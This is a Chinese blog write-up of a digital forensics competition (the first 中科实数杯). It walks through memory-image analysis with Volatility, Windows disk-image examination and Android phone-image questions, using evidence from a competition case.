<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"><title>第一届中科实数杯 | 2hl0k3r's Studio</title><meta name="keywords" content="中科"><meta name="author" content="2hl0k3r"><meta name="copyright" content="2hl0k3r"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta name="description" content="P.S. 因为本文没有参考别的师傅的wp 所以这个复盘难免会有疏漏 如果师傅们发现了还请帮我斧正">
<meta property="og:type" content="article">
<meta property="og:title" content="第一届中科实数杯">
<meta property="og:url" content="https://dawoxiansigema.github.io/2021/07/17/%E4%B8%AD%E7%A7%91%E7%AC%AC%E4%B8%80%E5%B1%8A/index.html">
<meta property="og:site_name" content="2hl0k3r&#39;s Studio">
<meta property="og:description" content="P.S. 因为本文没有参考别的师傅的wp 所以这个复盘难免会有疏漏 如果师傅们发现了还请帮我斧正">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7">
<meta property="article:published_time" content="2021-07-17T02:05:00.000Z">
<meta property="article:modified_time" content="2021-10-06T11:07:36.000Z">
<meta property="article:author" content="2hl0k3r">
<meta property="article:tag" content="中科">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"><link rel="shortcut icon" href="/img/favicon.png"><link rel="canonical" href="https://dawoxiansigema.github.io/2021/07/17/%E4%B8%AD%E7%A7%91%E7%AC%AC%E4%B8%80%E5%B1%8A/"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6/css/all.min.css" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.css" media="print" onload="this.media='all'"><script>const GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  translate: undefined,
  noticeOutdate: undefined,
  highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '',
  date_suffix: {
    just: '刚刚',
    min: '分钟前',
    hour: '小时前',
    day: '天前',
    month: '个月前'
  },
  copyright: undefined,
  lightbox: 'fancybox',
  Snackbar: undefined,
  source: {
    justifiedGallery: {
      js: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery@2/dist/fjGallery.min.js',
      css: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery@2/dist/fjGallery.min.css'
    }
  },
  isPhotoFigcaption: false,
  islazyload: false,
  isAnchor: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
  title: '第一届中科实数杯',
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isToc: true,
  postUpdate: '2021-10-06 19:07:36'
}</script><noscript><style type="text/css">
  #nav {
    opacity: 1
  }
  .justified-gallery img {
    opacity: 1
  }

  #recent-posts time,
  #post-meta time {
    display: inline !important
  }
</style></noscript><script>(win=>{
    win.saveToLocal = {
      set: function setWithExpiry(key, value, ttl) {
        if (ttl === 0) return
        const now = new Date()
        const expiryDay = ttl * 86400000
        const item = {
          value: value,
          expiry: now.getTime() + expiryDay,
        }
        localStorage.setItem(key, JSON.stringify(item))
      },

      get: function getWithExpiry(key) {
        const itemStr = localStorage.getItem(key)

        if (!itemStr) {
          return undefined
        }
        const item = JSON.parse(itemStr)
        const now = new Date()

        if (now.getTime() > item.expiry) {
          localStorage.removeItem(key)
          return undefined
        }
        return item.value
      }
    }
  
    win.getScript = url => new Promise((resolve, reject) => {
      const script = document.createElement('script')
      script.src = url
      script.async = true
      script.onerror = reject
      script.onload = script.onreadystatechange = function() {
        const loadState = this.readyState
        if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
        script.onload = script.onreadystatechange = null
        resolve()
      }
      document.head.appendChild(script)
    })
  
      win.activateDarkMode = function () {
        document.documentElement.setAttribute('data-theme', 'dark')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
        }
      }
      win.activateLightMode = function () {
        document.documentElement.setAttribute('data-theme', 'light')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
        }
      }
      const t = saveToLocal.get('theme')
    
          if (t === 'dark') activateDarkMode()
          else if (t === 'light') activateLightMode()
        
      const asideStatus = saveToLocal.get('aside-status')
      if (asideStatus !== undefined) {
        if (asideStatus === 'hide') {
          document.documentElement.classList.add('hide-aside')
        } else {
          document.documentElement.classList.remove('hide-aside')
        }
      }
    
    const detectApple = () => {
      if(/iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)){
        document.documentElement.classList.add('apple')
      }
    }
    detectApple()
    })(window)</script><meta name="generator" content="Hexo 5.4.0"></head><body><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img is-center"><img src="https://i.loli.net/2021/02/24/5O1day2nriDzjSu.png" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="sidebar-site-data site-data is-center"><a href="/archives/"><div class="headline">文章</div><div class="length-num">49</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">20</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">15</div></a></div><hr/></div></div><div class="post" id="body-wrap"><header class="post-bg" id="page-header" style="background-image: url('data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7')"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">2hl0k3r's Studio</a></span><div id="menus"><div id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></div></div></nav><div id="post-info"><h1 class="post-title">第一届中科实数杯</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2021-07-17T02:05:00.000Z" title="发表于 2021-07-17 10:05:00">2021-07-17</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2021-10-06T11:07:36.000Z" title="更新于 2021-10-06 19:07:36">2021-10-06</time></span><span class="post-meta-categories"><span class="post-meta-separator">|</span><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/Forensic/">Forensic</a></span></div><div class="meta-secondline"><span class="post-meta-separator">|</span><span class="post-meta-pv-cv" id="" data-flag-title="第一届中科实数杯"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">阅读量:</span><span id="busuanzi_value_page_pv"></span></span></div></div></div></header><main class="layout" id="content-inner"><div id="post"><article class="post-content" id="article-container"><p>P.S. 因为本文没有参考别的师傅的wp 所以这个复盘难免会有疏漏 如果师傅们发现了还请帮我斧正</p>
<p><img src="https://cdn.jsdelivr.net/gh/Dawoxiansigema/blog@1.4/images/startdash/404.png"></p>
<span id="more"></span>

<h1 id="内存镜像分析"><a href="#内存镜像分析" class="headerlink" title="内存镜像分析"></a>内存镜像分析</h1><p><strong>1.请分析系统中进程的运行情况，给出正在运行的进程数量。</strong></p>
<p>一把梭噢</p>
<figure class="highlight jboss-cli"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">./volatility.exe</span> -f 1.dd <span class="params">--profile=Win7SP1x86_23418</span> pslist</span><br></pre></td></tr></table></figure>

<p>不过要注意 有的时候psscan出来的进程会比pslist多 因为psscan会显示隐藏的进程 以多的那个数量为准</p>
<p><strong>2.请找出登录系统中的用户的SID号。</strong></p>
<p>我们getsids一下 发现出来一大串信息 很难进行查找 而getsids这个命令可以使用-p加进程号 来对某个进程进行单独分析 因为getsids是对所有进程进行分析的 我们分析chrome.exe进程</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./volatility<span class="selector-class">.exe</span> -f <span class="number">1</span><span class="selector-class">.dd</span> --profile=Win7SP1x86_23418 getsids -<span class="selector-tag">p</span> <span class="number">2184</span></span><br></pre></td></tr></table></figure>

<p>我们看看结果如何</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">chrome</span>.exe (<span class="number">2184</span>): S-<span class="number">1</span>-<span class="number">5</span>-<span class="number">21</span>-<span class="number">1208496363</span>-<span class="number">1471511537</span>-<span class="number">3676892945</span>-<span class="number">500</span> (Administrator)</span><br><span class="line"><span class="attribute">chrome</span>.exe (<span class="number">2184</span>): S-<span class="number">1</span>-<span class="number">5</span>-<span class="number">21</span>-<span class="number">1208496363</span>-<span class="number">1471511537</span>-<span class="number">3676892945</span>-<span class="number">513</span> (Domain Users)</span><br></pre></td></tr></table></figure>

<p>那肯定是第一个 除了这个长度以外的sid都没有意义</p>
<p><strong>3.请分析出该系统的启动时间，即开机时间。</strong></p>
<p>我们首先需要pslist一下 为什么后面会讲</p>
<figure class="highlight subunit"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">Offset(V)  Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start                          Exit</span><br><span class="line">---------- -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------</span><br><span class="line">0x86bcf020 System                    4      0    126     1676 ------      0 2018<span class="string">-10</span><span class="string">-25</span> 07:20:46 UTC<span class="string">+0000</span></span><br><span class="line">0x8813a878 smss.exe                316      4      2       30 ------      0 2018<span class="string">-10</span><span class="string">-25</span> 07:20:46 UTC<span class="string">+0000</span></span><br><span class="line">0x8812cd28 autochk.exe             328    316      0 -------- ------      0 2018<span class="string">-10</span><span class="string">-25</span> 07:20:46 UTC<span class="string">+0000</span>   2018<span class="string">-10</span><span class="string">-25</span> 07:20:46 UTC<span class="string">+0000</span></span><br><span class="line">0x88111398 smss.exe                380    316      0 --------      0      0 2018<span class="string">-10</span><span class="string">-25</span> 07:20:47 UTC<span class="string">+0000</span>   2018<span class="string">-10</span><span class="string">-25</span> 07:20:48 UTC<span class="string">+0000</span></span><br><span class="line">0x89322d28 csrss.exe               416    380      9      602      0      0 2018<span class="string">-10</span><span class="string">-25</span> 07:20:48 UTC<span class="string">+0000</span></span><br><span class="line">0x8939bd28 smss.exe                488    316      0 --------      1      0 2018<span class="string">-10</span><span class="string">-25</span> 07:20:48 UTC<span class="string">+0000</span>   2018<span class="string">-10</span><span class="string">-25</span> 07:20:49 UTC<span class="string">+0000</span></span><br><span class="line">0x8960ea08 csrss.exe               496    488     14     1130      1      0 2018<span class="string">-10</span><span class="string">-25</span> 07:20:48 UTC<span class="string">+0000</span></span><br><span class="line">0x88040400 wininit.exe             504    380      3       81      0      0 2018<span class="string">-10</span><span class="string">-25</span> 07:20:48 UTC<span class="string">+0000</span></span><br><span class="line">0x89627d28 winlogon.exe            552    488      3      114      1      0 2018<span class="string">-10</span><span class="string">-25</span> 07:20:49 UTC<span class="string">+0000</span></span><br><span class="line">0x8969fc80 services.exe            588    504      7      226      0      0 2018<span class="string">-10</span><span class="string">-25</span> 07:20:49 UTC<span class="string">+0000</span></span><br><span class="line">0x8968b320 lsass.exe               600    504      7      848      0      0 2018<span class="string">-10</span><span class="string">-25</span> 07:20:50 UTC<span class="string">+0000</span></span><br><span class="line">0x896abd28 lsm.exe                 612    504     10      157      0      0 2018<span class="string">-10</span><span class="string">-25</span> 07:20:50 UTC<span class="string">+0000</span></span><br><span class="line">0x8985d030 svchost.exe             740    588     13      375      0      0 2018<span class="string">-10</span><span class="string">-25</span> 07:20:57 UTC<span class="string">+0000</span></span><br><span class="line">0x8962f8c8 QQPGRTP.exe             876    588     57      430      0      0 2018<span class="string">-10</span><span class="string">-25</span> 07:20:57 UTC<span class="string">+0000</span></span><br></pre></td></tr></table></figure>

<p>pslist之后得到的是自开机键按下之后 所有进程的列表 而一开机加载的进程肯定是系统进程 包括系统 服务 认证 登录这些 而真正等系统加载完毕也就是开机了之后 才会开始加载其他应用的服务进程 所以QQPGRTP这个进程的开始加载 也就可以当作开机完成 所以时间是57s-46s=11s</p>
<p>4.请找出正在运行的所有以b开头的进程名（不区分大小写），写出其对应的程序的完整路径。</p>
<figure class="highlight vim"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./volatility.<span class="keyword">exe</span> -<span class="keyword">f</span> <span class="number">1</span>.dd --<span class="keyword">profile</span>=Win7SP1x86_23418 pslist | <span class="keyword">grep</span> B</span><br></pre></td></tr></table></figure>

<p>小写搜过搜大写 发现是百度网盘喔 然后我们filescan并且grep一下</p>
<figure class="highlight vim"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./volatility.<span class="keyword">exe</span> -<span class="keyword">f</span> <span class="number">1</span>.dd --<span class="keyword">profile</span>=Win7SP1x86_23418 filescan | <span class="keyword">grep</span> BaiduNetdisk.<span class="keyword">exe</span></span><br></pre></td></tr></table></figure>

<figure class="highlight taggerscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0x000000007c7bbbc0      4      0 R--r-d <span class="symbol">\D</span>evice<span class="symbol">\H</span>arddiskVolume1<span class="symbol">\U</span>sers<span class="symbol">\A</span>dministrator<span class="symbol">\A</span>ppData<span class="symbol">\R</span>oaming<span class="symbol">\B</span>aidu<span class="symbol">\B</span>aiduNetdisk<span class="symbol">\B</span>aiduNetdisk.exe</span><br></pre></td></tr></table></figure>

<p>因为他pslist之后没有退出时间 所以是正在运行的进程</p>
<p>当然还有一个记录是Bandizip 是从userassit找到的</p>
<figure class="highlight vim"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./volatility.<span class="keyword">exe</span> -<span class="keyword">f</span> <span class="number">1</span>.dd --<span class="keyword">profile</span>=Win7SP1x86_23418 userassist | <span class="keyword">grep</span> Bandizip</span><br></pre></td></tr></table></figure>

<p><strong>5.该系统中的打印服务是否开启，请给出其状态（SERVICE_RUNNING /SERVICE_STOPPED）。</strong></p>
<p>熟悉(百度过)的同学可能知道 打印机的服务名叫spooler</p>
<figure class="highlight gcode"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./volatility.exe -f <span class="number">1.</span>dd --profile=Wi<span class="symbol">n7</span>SP<span class="number">1</span>x<span class="number">86</span>_<span class="number">23418</span> s<span class="attr">vcscan &gt; 1</span>.txt</span><br></pre></td></tr></table></figure>

<p>我们在导出的文件里搜索spooler就可以了 也可以使用取证大师的内存分析</p>
<p><strong>6.请给出系统联网时使用的IP地址。</strong></p>
<p>netscan一把梭喔</p>
<figure class="highlight jboss-cli"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">./volatility.exe</span> -f 1.dd <span class="params">--profile=Win7SP1x86_23418</span> netscan</span><br></pre></td></tr></table></figure>

<p>因为题目说的是系统联网时使用的地址 我们要看的是远端地址 因为可能有NAT协议 使用本地地址是私网还是公网的无所谓 关键是远端的地址得是公网的</p>
<p>7、8、9题都是netscan一把梭 不赘述了喔</p>
<h1 id="Windows磁盘镜像取证分析"><a href="#Windows磁盘镜像取证分析" class="headerlink" title="Windows磁盘镜像取证分析"></a><strong>Windows磁盘镜像取证分析</strong></h1><p><strong>1.请通过分析给出该操作系统的详细版本号，以及安装时间。</strong></p>
<figure class="highlight subunit"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">名称：当前版本</span><br><span class="line">值：6.1</span><br><span class="line">系统：Windows 7 Ultimate</span><br><span class="line"></span><br><span class="line">名称：安装时间</span><br><span class="line">值：2018<span class="string">-10</span><span class="string">-25</span> 12:05:09</span><br><span class="line">系统：Windows 7 Ultimate</span><br></pre></td></tr></table></figure>

<p>一把梭了 不解释</p>
<p><strong>2.找出系统最后一次的正常关机时间。</strong></p>
<p>注意是正常关机 不解释了一把梭</p>
<figure class="highlight subunit"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">开机时间：2018<span class="string">-10</span><span class="string">-25</span> 12:26:08</span><br><span class="line">关机时间：2018<span class="string">-10</span><span class="string">-25</span> 13:28:26</span><br><span class="line">持续时间：0:01:02:18</span><br><span class="line">备注：系统即将进入睡眠状态。</span><br></pre></td></tr></table></figure>

<p><strong>3.查找最后一次登录系统中的用户账号。</strong></p>
<p>一把梭 不过题目就一个Guest和一个zhangsan123 还只有张三有显示登陆时间 就过于简单</p>
<figure class="highlight subunit"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">用户名：zhangsan123</span><br><span class="line">用户类型：本地用户</span><br><span class="line">用户标识(SID)：S<span class="string">-1</span><span class="string">-5</span><span class="string">-21</span><span class="string">-1208496363</span><span class="string">-1471511537</span><span class="string">-3676892945</span><span class="string">-500</span></span><br><span class="line">用户目录：C:\Users\Administrator</span><br><span class="line">上次登录时间：2018<span class="string">-10</span><span class="string">-25</span> 15:21:04</span><br></pre></td></tr></table></figure>

<p><strong>4.找出所有安装的浏览器名称和对应的安装时间。</strong></p>
<p>这法外狂徒还挺牛逼 上网记录那边显示整整8个浏览器 但是有疑问<br>为什么取证大师只能检测到包括IE在内的5种浏览器呢</p>
<p>我猜测是因为 可能有些浏览器不是使用安装包安装的 而是通过直接复制的方式拷贝过来的 没安装的话注册表之类的就不会加载这个浏览器的信息 我们去试一下 直接跳到源文件</p>
<img src="/2021/07/17/%E4%B8%AD%E7%A7%91%E7%AC%AC%E4%B8%80%E5%B1%8A/9.png" class="">

<p>哇 整整齐齐的创建与访问时间 这里有一个小点 如果你从你的外部介质(U盘或者移动硬盘)里面拷取了文件到你的电脑上 那么这个文件的创建和访问时间就是你拷到电脑上的时间 而修改时间却不会发生变化 这个很关键 而从修改时间来看 这修改时间是在系统安装之前 所以一定是从外部介质上面复制过来的</p>
<p>当然已安装的可以取证大师一把梭 剩下的IE安装时间就是系统安装时间 但是不是上面第一题那个 后面会说</p>
<figure class="highlight taggerscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">名称：Google Chrome</span><br><span class="line">安装路径：C:<span class="symbol">\U</span>sers<span class="symbol">\A</span>dministrator<span class="symbol">\A</span>ppData<span class="symbol">\L</span>ocal<span class="symbol">\G</span>oogle<span class="symbol">\C</span>hrome<span class="symbol">\A</span>pplication</span><br><span class="line">公司：Google Inc.</span><br><span class="line">安装日期：2018-10-25 14:05:34</span><br><span class="line">版本：70.0.3538.67</span><br></pre></td></tr></table></figure>

<p>安装信息之类的取证大师都可以一把梭</p>
<p><strong>5.查找系统中最后一次使用的QQ号码以及退出时间。</strong></p>
<p>仿真仿不起来 数据库解析需要密码 QQ密码这东西 原则上我们是没办法破解的 只能看他是不是藏在哪个文件里面了 QQ号码好说 但是退出时间还真不好搞 先鸽子</p>
<p><strong>6.分析各浏览器访问的网页记录，找出最后一次的访问网址。</strong></p>
<p>反正就嗯找</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">解码后的URL：http:<span class="regexp">//</span>news.baidu.com/</span><br><span class="line">标题：百度新闻——全球最大的中文新闻平台</span><br><span class="line">最后访问时间：<span class="number">2018</span>-<span class="number">10</span>-<span class="number">25</span> <span class="number">15</span>:<span class="number">27</span>:<span class="number">03</span></span><br><span class="line">访问次数：<span class="number">1</span></span><br><span class="line">原始URL：http:<span class="regexp">//</span>news.baidu.com/</span><br></pre></td></tr></table></figure>

<p>感觉是这个</p>
<p><strong>7.分析磁盘中是否有文件删除的痕迹，列出被删除的文件名和路径。</strong></p>
<p>怎么说呢 出的还行这题 以我的个人习惯 我会先看一眼这个人的电脑桌面有什么文件 不要小看了桌面这个文件夹噢 当然一开始入手的点肯定还是Recycle.bin 也就是回收站文件夹的 很明显回收站文件夹是空的 不然一下就搞定了</p>
<p>首先我们取证大师读出来的并不是前面内存取证得到的zhangsan123这个用户名 而是Admin</p>
<p>进到了桌面 发现这个人桌面什么都没有 就一堆软件的快捷方式 起初是没什么想法的 后来我去了最近打开的文档这个点看</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">最近访问的文档：会议信息.docx</span><br><span class="line">完整路径：C:\Users\Administrator\Desktop\会议信息.docx</span><br><span class="line">创建时间：<span class="number">2018</span><span class="regexp">/10/</span><span class="number">25</span> <span class="number">12</span>:<span class="number">27</span>:<span class="number">22</span></span><br><span class="line">修改时间：<span class="number">2018</span><span class="regexp">/10/</span><span class="number">25</span> <span class="number">12</span>:<span class="number">27</span>:<span class="number">22</span></span><br><span class="line">最后访问时间：<span class="number">2018</span><span class="regexp">/10/</span><span class="number">25</span> <span class="number">12</span>:<span class="number">27</span>:<span class="number">22</span></span><br><span class="line">系统：Windows <span class="number">7</span> Ultimate</span><br><span class="line">用户：Administrator</span><br><span class="line">删除状态：正常</span><br></pre></td></tr></table></figure>

<p>诶这个路径不是桌面吗 那桌面不是没有吗 那不就是删了吗XD</p>
<p><strong>8.检查系统日期和时间有无更改，列出更改的详细情况。</strong></p>
<p>首先去系统信息那边看 上面写的安装时间是2018-10-25 12:05:09 最后一次关机时间是同天的12:26:02 你这电脑刚买回家 开机20分钟 qq微信什么的才都下好 然后警察叔叔就冲进来把你的电脑收了 像话吗</p>
<p>然后去看日志文件我感觉去看系统开关机时间也不准 这个应该也能改 然后去看日志</p>
<img src="/2021/07/17/%E4%B8%AD%E7%A7%91%E7%AC%AC%E4%B8%80%E5%B1%8A/1.png" class="">

<p>系统日志 各种初始化相关的日志文件 并且起始时间都是很连续的 2018-06-02 21:56:05一直从5s到10几s 我感觉这个才是正确的系统安装时间</p>
<p>但是这样不严谨 我们来到系统根目录下</p>
<img src="/2021/07/17/%E4%B8%AD%E7%A7%91%E7%AC%AC%E4%B8%80%E5%B1%8A/10.png" class="">

<p>看到这一串带$开头的文件了吗 这些文件有着整整齐齐的的三个时间 这些$文件是随机系统安装就自动生成的磁盘配置文件 这些文件才可以真正标志安装时间</p>
<p>当然更详细的信息只能导出查看事件查看器了</p>
<p><strong>9.给出在该系统上登录百度网盘的账号名称。</strong></p>
<p>百度网盘这玩意 登陆的是百度账号 而百度账号这玩意 用户名是无法重复的 而这该死的用户名是没办法改的 也就是唯一的</p>
<p>一把梭 账号名叫asdfjjgg</p>
<p><strong>10.找出曾经连接过该系统的USB移动储存装置(U盘)的最后一次插拔时间。</strong></p>
<p>一把梭</p>
<figure class="highlight subunit"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">USB设备名称：Kingston DataTraveler 3.0 USB Device</span><br><span class="line">厂商_产品_版本：Disk&amp;Ven_Kingston&amp;Prod_DataTraveler_3.0&amp;Rev_PMAP</span><br><span class="line">首次插拔时间：2018<span class="string">-10</span><span class="string">-25</span> 14:37:09</span><br><span class="line">最后插拔时间：2018<span class="string">-10</span><span class="string">-25</span> 15:20:49</span><br><span class="line">最后一次启动的首次插拔时间：2018<span class="string">-10</span><span class="string">-25</span> 15:20:49</span><br><span class="line">挂载盘符：E:</span><br><span class="line">系统用户：Administrator</span><br><span class="line">设备描述：USB 大容量存储设备</span><br></pre></td></tr></table></figure>

<p><strong>11.请找出最后一次通过Word编辑的文档名称和修改时间。</strong></p>
<p>如果说直接从取证大师最近访问的文档这样一把梭的话 很快能出来</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">最近访问的文档：会议信息.docx</span><br><span class="line">完整路径：C:\Users\Administrator\Desktop\会议信息.docx</span><br><span class="line">创建时间：<span class="number">2018</span><span class="regexp">/10/</span><span class="number">25</span> <span class="number">12</span>:<span class="number">27</span>:<span class="number">22</span></span><br><span class="line">修改时间：<span class="number">2018</span><span class="regexp">/10/</span><span class="number">25</span> <span class="number">12</span>:<span class="number">27</span>:<span class="number">22</span></span><br><span class="line">最后访问时间：<span class="number">2018</span><span class="regexp">/10/</span><span class="number">25</span> <span class="number">12</span>:<span class="number">27</span>:<span class="number">22</span></span><br></pre></td></tr></table></figure>

<p>但是把 个人感觉不是很稳妥 要知道只要打开.docx这样的文件就会在Recent文件夹里面留下lnk快捷方式 所以查看lnk文件修改时间最迟的那个</p>
<figure class="highlight taggerscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">名称：会议信息.LNK</span><br><span class="line">快捷文件全路径：分区1_本地磁盘[C]:<span class="symbol">\U</span>sers<span class="symbol">\A</span>dministrator<span class="symbol">\A</span>ppData<span class="symbol">\R</span>oaming<span class="symbol">\M</span>icrosoft<span class="symbol">\O</span>ffice<span class="symbol">\R</span>ecent<span class="symbol">\会</span>议信息.LNK</span><br><span class="line">目标文件：C:<span class="symbol">\U</span>sers<span class="symbol">\A</span>dministrator<span class="symbol">\D</span>esktop<span class="symbol">\会</span>议信息.docx</span><br><span class="line">创建时间：2018-10-25 12:27:22</span><br><span class="line">修改时间：2018-10-25 12:28:44</span><br><span class="line">最后访问时间：2018-10-25 12:28:44</span><br></pre></td></tr></table></figure>

<p>虽说是一个文件 但是修改时间还是有点不同喔</p>
<h1 id="手机镜像取证"><a href="#手机镜像取证" class="headerlink" title="手机镜像取证"></a>手机镜像取证</h1><p><strong>1.检材手机data分区的MD5和SHA256哈希值。</strong></p>
<p>首先我们得判断出哪个才是data分区 手机储存空间可以大致分为三个分区 System Data 还有Sdcard的Sd分区</p>
<p>前两个顾名思义 第三个指的是储存卡的分区 而安卓手机是基于Uinx框架的 所以如果是系统分区 那么应该是可以看到许多Uinx的标志性文件夹的 比如etc usr bin lib这种典型在系统分区下存放系统以及用户文件的文件夹</p>
<img src="/2021/07/17/%E4%B8%AD%E7%A7%91%E7%AC%AC%E4%B8%80%E5%B1%8A/2.png" class="">

<p>所以还是蛮好判断的 判断完之后就知道分区26是data分区 拖到取证大师里面算一下就好了(我自己懒得算了)</p>
<p><strong>2.检材手机的设备名称和IMEI码。</strong></p>
<p>一把梭喔 不解释了</p>
<img src="/2021/07/17/%E4%B8%AD%E7%A7%91%E7%AC%AC%E4%B8%80%E5%B1%8A/3.png" class="">

<p><strong>3.检材手机连接过的WiFi名称及密码。</strong></p>
<p>一把梭喔 有手就行</p>
<img src="/2021/07/17/%E4%B8%AD%E7%A7%91%E7%AC%AC%E4%B8%80%E5%B1%8A/4.png" class="">

<p><strong>4.找出手机中曾经使用过的QQ号码。</strong></p>
<img src="/2021/07/17/%E4%B8%AD%E7%A7%91%E7%AC%AC%E4%B8%80%E5%B1%8A/5.png" class="">

<p><strong>5.最后一个接通电话的日期、通话号码及时长。</strong></p>
<p>通话记录那边看吧 不想截图了</p>
<p><strong>6.手机中象棋游戏的应用包名称及安装时间。</strong></p>
<p>文件夹及里面所有的文件都是2018-10-25 23:06:35这个时间创建的 就是他</p>
<p>7.手机浏览器中搜索过的<strong>关键词数量</strong>及<strong>最后一次搜索的关键词</strong>。</p>
<p>搜索过的关键词数量 要去重 最后一次搜的也可以看时间 一把梭</p>
<p><strong>8.2018年使用浏览器访问次数最多的Web网站及其最后访问时间。</strong></p>
<p>可以在历史记录那一栏 对历史记录的网址进行排序 就很容易看出来 18年访问次数最多的网站是</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https:<span class="regexp">//</span>k.sougou.com</span><br></pre></td></tr></table></figure>

<p><strong>9.手机最后一次的开机时间。</strong></p>
<p>比较奇怪 只有一次2018-10-25 22:34:17的开机记录 我再找找 找不到就先认定是他</p>
